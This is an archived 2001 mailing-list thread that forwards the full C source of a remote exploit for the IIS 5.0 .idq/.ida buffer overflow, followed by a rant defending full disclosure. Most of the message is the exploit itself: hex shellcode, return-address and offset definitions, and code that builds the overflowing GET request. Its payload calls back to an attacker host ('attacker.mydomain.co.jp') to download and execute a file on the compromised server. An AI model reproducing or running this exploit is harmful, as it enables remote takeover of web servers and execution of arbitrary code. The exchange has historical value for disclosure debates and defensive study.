This came across Steve's win2ksec mailing list almost a week or so ago. Not sure why none of the securityfocus mailing lists have picked it up (at least to my knowledge). Working remote IIS exploit for the .ida hole. Figured since you guys have had a discussion about writing a exploit for it etc... this might be helpful to you. Signed, Marc Maiffret Chief Hacking Officer eEye Digital Security T.949.349.9062 F.949.349.9538 http://eEye.com/Retina - Network Security Scanner http://eEye.com/Iris - Network Traffic Analyzer http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities ||> ----- Original Message ----- ||> From: "Steve" <steveat_private> ||> To: <win2ksecadviceat_private> ||> Sent: Wednesday, June 27, 2001 2:57 PM ||> Subject: Fwd: Full Disclosure .ida exploit. ||> ||> ||> > This was sent to me a few minutes ago. Here is the code as posted to ||> Packet Storm and a rant by the person who brought it to my attention. ||While ||> I normally have tried to keep rants off of the mailing list, I ||have always ||> been very pro full disclosure and will do my best to defend it. Please ||> note, I have not verified this code to be functioning but will make an ||> attempt to later this evening. If anyone else has time (Ken? Mark?) ||please ||> do so and post to the list. ||> > ||> > -Steve ||> > ||> > /* ||> > IIS5.0 .idq overrun remote exploit ||> > Programmed by hsj : 01.06.21 ||> > ||> > code flow: ||> > overrun -> jmp or call ebx -> jmp 8 -> ||> > check shellcode addr and jump to there -> ||> > shellcode -> make back channel -> download & exec code ||> > */ ||> > #include <stdio.h> ||> > #include <stdlib.h> ||> > #include <string.h> ||> > #include <signal.h> ||> > #include <sys/types.h> ||> > #include <sys/socket.h> ||> > #include <sys/ioctl.h> ||> > #include <sys/time.h> ||> > #include <sys/wait.h> ||> > #include <errno.h> ||> > #include <unistd.h> ||> > #include <fcntl.h> ||> > #include <netinet/in.h> ||> > #include <limits.h> ||> > #include <netdb.h> ||> > #include <arpa/inet.h> ||> > ||> > #define RET 0x77e516de /* jmp or call ebx */ ||> > #define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA ||*/ ||> > #define GPADDRESS 0x77e59ac1 /* Address of |GetProcAddress */ ||> > #define GMHANDLEA_OFFSET 24 ||> > #define GPADDRESS_OFFSET 61 ||> > #define OFFSET 234 /* exception handler offset */ ||> > #define NOP 0x41 ||> > ||> > #define MASKING 1 ||> > #if MASKING ||> > #define PORTMASK 0x4141 ||> > #define ADDRMASK 0x41414141 ||> > #define PORTMASK_OFFSET 128 ||> > #define ADDRMASK_OFFSET 133 ||> > #endif ||> > ||> > #define PORT 80 ||> > #define ADDR "attacker.mydomain.co.jp" ||> > #define PORT_OFFSET 115 ||> > #define ADDR_OFFSET 120 ||> > unsigned char shellcode[]= ||> > "\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0" ||> > "\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50" ||> > "\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88" ||> > "\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB" ||> > "\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8" ||> > "\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0" ||> > "\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66" ||> > "\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11" ||> > #if MASKING ||> > "\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41" ||> > #endif ||> > "\x8B\x46\xF8\xFF\xD0\x33\xC0" ||> > "\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07" ||> > "\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0" ||> > "\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B" ||> > "\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46" ||> > "\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0" ||> > "\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0"; ||> > ||> > unsigned char storage[]= ||> > "\xEB\x02" ||> > "\xEB\x4E" ||> > "\xE8\xF9\xFF\xFF\xFF" ||> > "msvcrt.ws2_32.socket.connect.recv.closesocket." ||> > "_open._write._close._execl."; ||> > ||> > unsigned char forwardjump[]= ||> > "%u08eb"; ||> > ||> > unsigned char jump_to_shell[]= ||> > "%uC033%uB866%u031F%u0340%u8BD8%u8B03" ||> > "%u6840%uDB33%u30B3%uC303%uE0FF"; ||> > ||> > unsigned int resolve(char *name) ||> > { ||> > struct hostent *he; ||> > unsigned int ip; ||> > ||> > if((ip=inet_addr(name))==(-1)) ||> > { ||> > if((he=gethostbyname(name))==0) ||> > return 0; ||> > memcpy(&ip,he->h_addr,4); ||> > } ||> > return ip; ||> > } ||> > ||> > int make_connection(char *address,int port) ||> > { ||> > struct sockaddr_in server,target; ||> > int s,i,bf; ||> > fd_set wd; ||> > struct timeval tv; ||> > ||> > s = socket(AF_INET,SOCK_STREAM,0); ||> > if(s<0) ||> > return -1; ||> > memset((char *)&server,0,sizeof(server)); ||> > server.sin_family = AF_INET; ||> > server.sin_addr.s_addr = htonl(INADDR_ANY); ||> > server.sin_port = 0; ||> > ||> > target.sin_family = AF_INET; ||> > target.sin_addr.s_addr = resolve(address); ||> > if(target.sin_addr.s_addr==0) ||> > { ||> > close(s); ||> > return -2; ||> > } ||> > target.sin_port = htons(port); ||> > bf = 1; ||> > ioctl(s,FIONBIO,&bf); ||> > tv.tv_sec = 10; ||> > tv.tv_usec = 0; ||> > FD_ZERO(&wd); ||> > FD_SET(s,&wd); ||> > connect(s,(struct sockaddr *)&target,sizeof(target)); ||> > if((i=select(s+1,0,&wd,0,&tv))==(-1)) ||> > { ||> > close(s); ||> > return -3; ||> > } ||> > if(i==0) ||> > { ||> > close(s); ||> > return -4; ||> > } ||> > i = sizeof(int); ||> > getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); ||> > if((bf!=0)||(i!=sizeof(int))) ||> > { ||> > close(s); ||> > errno = bf; ||> > return -5; ||> > } ||> > ioctl(s,FIONBIO,&bf); ||> > return s; ||> > } ||> > ||> > int get_connection(int port) ||> > { ||> > struct sockaddr_in local,remote; ||> > int lsock,csock,len,reuse_addr; ||> > ||> > lsock = socket(AF_INET,SOCK_STREAM,0); ||> > if(lsock<0) ||> > { ||> > perror("socket"); ||> > exit(1); ||> > } ||> > reuse_addr = 1; ||> > if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char ||> *)&reuse_addr,sizeof(reuse_addr))<0) ||> > { ||> > perror("setsockopt"); ||> > close(lsock); ||> > exit(1); ||> > } ||> > memset((char *)&local,0,sizeof(local)); ||> > local.sin_family = AF_INET; ||> > local.sin_port = htons(port); ||> > local.sin_addr.s_addr = htonl(INADDR_ANY); ||> > if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0) ||> > { ||> > perror("bind"); ||> > close(lsock); ||> > exit(1); ||> > } ||> > if(listen(lsock,1)<0) ||> > { ||> > perror("listen"); ||> > close(lsock); ||> > exit(1); ||> > } ||> > retry: ||> > len = sizeof(remote); ||> > csock = accept(lsock,(struct sockaddr *)&remote,&len); ||> > if(csock<0) ||> > { ||> > if(errno!=EINTR) ||> > { ||> > perror("accept"); ||> > close(lsock); ||> > exit(1); ||> > } ||> > else ||> > goto retry; ||> > } ||> > close(lsock); ||> > return csock; ||> > } ||> > ||> > int main(int argc,char *argv[]) ||> > { ||> > int i,j,s,pid; ||> > unsigned int cb; ||> > unsigned short port; ||> > char *p,buf[512],buf2[512],buf3[2048]; ||> > FILE *fp; ||> > ||> > if(argc!=3) ||> > { ||> > printf("usage: $ %s ip file\n",argv[0]); ||> > return -1; ||> > } ||> > if((fp=fopen(argv[2],"rb"))==0) ||> > return -2; ||> > ||> > if(!(cb=resolve(ADDR))) ||> > return -3; ||> > ||> > if((pid=fork())<0) ||> > return -4; ||> > ||> > if(pid) ||> > { ||> > fclose(fp); ||> > s = make_connection(argv[1],80); ||> > if(s<0) ||> > { ||> > printf("connect error:[%d].\n",s); ||> > kill(pid,SIGTERM); ||> > return -5; ||> > } ||> > ||> > j = strlen(shellcode); ||> > *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA; ||> > *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS; ||> > port = htons(PORT); ||> > #if MASKING ||> > port ^= PORTMASK; ||> > cb ^= ADDRMASK; ||> > *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK; ||> > *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK; ||> > #endif ||> > *(unsigned short *)&shellcode[PORT_OFFSET] = port; ||> > *(unsigned int *)&shellcode[ADDR_OFFSET] = cb; ||> > for(i=0;i<strlen(shellcode);i++) ||> > { ||> > if((shellcode[i]==0x0a)|| ||> > (shellcode[i]==0x0d)|| ||> > (shellcode[i]==0x3a)) ||> > break; ||> > } ||> > if(i!=j) ||> > { ||> > printf("bad portno or ip address...\n"); ||> > close(s); ||> > kill(pid,SIGTERM); ||> > return -6; ||> > } ||> > ||> > memset(buf,1,sizeof(buf)); ||> > p = &buf[OFFSET-2]; ||> > sprintf(p,"%s",forwardjump); ||> > p += strlen(forwardjump); ||> > *p++ = 1; ||> > *p++ = '%'; ||> > *p++ = 'u'; ||> > sprintf(p,"%04x",(RET>>0)&0xffff); ||> > p += 4; ||> > *p++ = '%'; ||> > *p++ = 'u'; ||> > sprintf(p,"%04x",(RET>>16)&0xffff); ||> > p += 4; ||> > *p++ = 1; ||> > sprintf(p,"%s",jump_to_shell); ||> > ||> > memset(buf2,NOP,sizeof(buf2)); ||> > ||> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],stor ||age,strle ||> n(storage)); ||> > ||> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(she ||llcode)); ||> > buf2[sizeof(buf2)-1] = 0; ||> > ||> > sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell: ||> %s\r\n\r\n",buf,buf2); ||> > write(s,buf3,strlen(buf3)); ||> > ||> > printf("---"); ||> > for(i=0;i<strlen(buf3);i++) ||> > { ||> > if((i%16)==0) ||> > printf("\n"); ||> > printf("%02X ",buf3[i]&0xff); ||> > } ||> > printf("\n---\n"); ||> > ||> > wait(0); ||> > sleep(1); ||> > shutdown(s,2); ||> > close(s); ||> > ||> > printf("Done.\n"); ||> > } ||> > else ||> > { ||> > s = get_connection(PORT); ||> > j = 0; ||> > while((i=fread(buf,1,sizeof(buf),fp))) ||> > { ||> > write(s,buf,i); ||> > j += i; ||> > printf("."); ||> > fflush(stdout); ||> > } ||> > fclose(fp); ||> > printf("\n%d bytes send...\n",j); ||> > ||> > shutdown(s,2); ||> > close(s); ||> > } ||> > ||> > return 0; ||> > } ||> > ||> > ||> > ||> > ||> > >From: fuq69rcat_private ||> > >Date: Wed, 27 Jun 2001 13:17:57 -0800 (PDT) ||> > >To: steveat_private ||> > >Subject: Full Disclosure .ida exploit. ||> > > ||> > >Steve I hope you let this through you your win2k mailing list. I know ||its ||> > >a bit of a rant but I think it needs to be said and also the |fact that ||> there ||> > >is a link to the .ida exploit should be worth while enough. Thanks. ||> > >----- ||> > >Isn't it strange that a gift can be an enemy? That a ||privilege can be a ||> > >chore. Maybe its just me but security is going nowhere fast because ||> everyone ||> > >is to busy looking at the ten thousand foot view instead of getting ||down, ||> > > getting their hands dirty, and fixing the problem at its core. ||> > > ||> > >I see everyone trying to run around and figure out what to do ||about the ||> > >hax0rs and the script kiddies. Bureaucrats and has never |been security ||> experts ||> > >are all looking to form organizations that they hope will cut down on ||the ||> > >"threat" of vulnerability exposure, when thats not the real problem. ||> Software ||> > >companies writing insecure software IS the problem. ||> > > ||> > >Who gets shit on in the end? The hackers and researchers |putting their ||> own ||> > >time into finding vulnerabilities in software thats been developed by ||> multi- ||> > >billion dollar software companies. These same hackers and researchers ||who ||> > >have done all of this work for FREE, to help the security community. ||They ||> > >end up being the ones that get shit on for releasing this information ||to ||> > >the masses so that they might help educate people about security ||> vulnerabilities ||> > >and keep software companies on their toes and honest about ||the security ||> > >issues that affect their software. ||> > > ||> > >Most software companies do not take security seriously, regardless of ||> what ||> > >they say, because the bean counters at most software companies never ||see ||> > >an ROI (Return on Investment) for adding much needed security ||mechanisms ||> > >to their security software. Why not? because honestly not ||enough people ||> > >are standing up and demanding for a change. Instead the majority of ||> administrators, ||> > > NT at least, tend to just laugh and say, for example, "Ahh haha ||another ||> > >MS hole, what's new" and then proceed to shrug it off, stay |bent over, ||> and ||> > >keep taking it from software companies. ||> > > ||> > >Also for those administrators that actually do care about security ||you'll ||> > >tend to find that a lot of them are actually paranoid about |installing ||> security ||> > >patches from companies like Microsoft because they've had a |really bad ||> track ||> > >record on creating patches that end up breaking and then need patches ||> themselves. ||> > >So the administrators end up waiting for the next service pack (which ||> leaves ||> > >them vulnerable), UNLESS they have a full disclosure example exploit ||that ||> > >first hand shows them how serious the vulnerability is, at |which point ||I ||> > >promise you they WILL install the patch. ||> > > ||> > >I could go on forever about the circles the security industry is ||running ||> > >in or how 80% of the "security experts" have never done ANYTHING to ||help ||> > >security (hi russ!!) besides spout off their mouth about topics they ||> usually ||> > >have never really experienced first hand. ||> > > ||> > >A handful of people, like Russ Cooper, have said that when people ||release ||> > >non-malicious example exploits that it makes it easier for people to ||take ||> > >those exploits and tweak them into doing bad things. That is ||completely ||> > >inaccurate and its a statement being made by someone who |wouldn't know ||> what ||> > >an exploit was if shellcode slapped him in the face. ||> > > ||> > >I came across this the other day on packetstorm. Working .ida exploit ||> which ||> > >is probably one of the first publicly released, although as ||always when ||> > >any big hole is released and you don't see exploits on |Bugtraq or what ||> not ||> > >that MEANS thats because people aren't sharing their exploits with ||> everyone ||> > >but they are out there and most likely being used. ||> > > ||> > ||> ||>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&u ||name=anon ||> ymous&datopic=General&mesgcheck=defined&gum=3087&editoron= ||> > > ||> > >There is a whole other world out there that few people can even begin ||to ||> > >understand. Exploits are created daily for all types of ||vulnerabilities ||> > >that people might have a use for. Just because you dont see it on the ||> handful ||> > >of security mailing lists, or because CERT, NIPC, or Russ Cooper have ||not ||> > >heard about it does not mean it is not there. ||> > > ||> > >All those opposed to full disclosure, be damned. For to resist is to ||piss ||> > >against the wind and all who do will end up smelling. ||> > >Free, encrypted, secure Web-based email at www.hushmail.com ||> > ||> > _____________________________________________________________________ ||> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ||> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" ||> > SEND ALL COMMANDS TO: listservat_private ||> > ||> ||> || ||
This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 22:01:56 PDT